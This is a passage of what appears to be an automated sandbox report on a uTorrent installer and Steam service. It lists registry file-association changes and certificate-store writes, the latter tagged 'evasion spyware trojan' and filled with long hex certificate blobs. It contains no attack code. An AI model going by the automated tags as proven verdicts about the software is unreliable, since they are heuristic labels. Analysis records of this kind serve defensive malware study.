Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\ = "Magnet URI" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.torrent C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\ = "Torrent" C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\DefaultIcon\ = "steam.exe" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\Content Type = "application/x-bittorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\DefaultIcon C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\"" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open\command C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Torrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\utorrent\\pro\\resources\\torrent-icon.ico" C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open\Command C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\steam\ = "URL:steam protocol" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\DefaultIcon C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open\Command C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\URL Protocol C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\DefaultIcon C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\steam\URL Protocol C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\URL Protocol C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\Torrent_backup C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343120000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 5c00000001000000040000000008000019000000010000001000000091fad483f14848a8a69b18b805cdbb3a0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d3431040000000100000010000000ee2931bc327e9ae6e8b5f751b434719020000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0 C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0\Blob = 030000000100000014000000c94dc4831a901a9fec0fb49b71bd49b5aad4fad01400000001000000140000009327469803a951688e98d6c44248db23bf5894d204000000010000001000000026864c28a4de37f569c1ec87a0eccb270f0000000100000020000000b35e05950cfbd8259f9375ba101870b8c3c4c0ec5a529757e63167e9de26a9e81900000001000000100000009f6337f867e721aac07c3ba0fbdb64315c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000005b040000308204573082023fa003020102021100b0573e9173972770dbb487cb3a452b38300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3234303331333030303030305a170d3237303331323233353935395a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b30090603550403130245363076301006072a8648ce3d020106052b8104002203620004d9f19e4687f8217160a826eba3fab9eada1db912a7d426d95114b1617c7596bf220b391fd5bed10a46aa2d3c4a09842ebe409555e91940376675ed324e770449f8707bc318e7cef77110feac74d800d4ed6d1c731633109c3ab2ea6c62f4bdb8a381f83081f5300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e041604149327469803a951688e98d6c44248db23bf5894d2301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30130603551d20040c300a3008060667810c01020130270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f300d06092a864886f70d01010b050003820201007d8b7b4a2035b20586088a6e9e4e3aaf8004c4845c33190a81484d96baefd41db584e69737fe66884f8b3936eb72653f33dcaf0ba31563bdf418d1682fc22127c8fcbeb38ba4c636d8e3fa6da4b593d60caed0d3970247a066f2d384e14d47810e4b12f518ae1ef89c66a05e75074817ae6966e86978370605c2e261ab10aff10ee60c71b4bc939a0b0748e55205c14e9fd960bfb2c408fabd8bb99f1f79a9c60ad1292c47a4ea19d0a5cc701fa11eebe59251e7b6f708d2630c4349a1623eaab4c152b64175469086dc83dd230a55090aaef0657bb3cb9b927473b3edc2fc19b5f5114ea223e90e4c2fc8d7ef990d785e4caaa8a2b9a19f33843df69054509316bcb994ae878693226171927bb7f70681c484571388cac6502641ce108c5668ab52a642a420d09ff5245f11945bc96acd557232ef625bd4076b7a9e93baa108c1de5f8f35fd03a501fb894c775b3e408d00a2e8bdb9163c84d3aaba059fd0966b58765ffc6586a8e1246a3c4b3fe9c02217e41fe73836524696b43a619752ca32e4cd2e8b6fb17f7d1cfebd5767da3727a0a1d4342f24c0a6bfef4f4d583c4e3abcdb032e02bee1c2fa4ebcc2fdae1672617949127ddfccebbff76e2472d740892ee6fd3e1303b2e7d1dd9b43d3fc4afff387435740928dd47fd97b99337929cac48a2e00f570a88303e21182e3830b17cef5cc98220e3abfd985981bf21f4e C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 19000000010000001000000091fad483f14848a8a69b18b805cdbb3a0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343120000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e2041757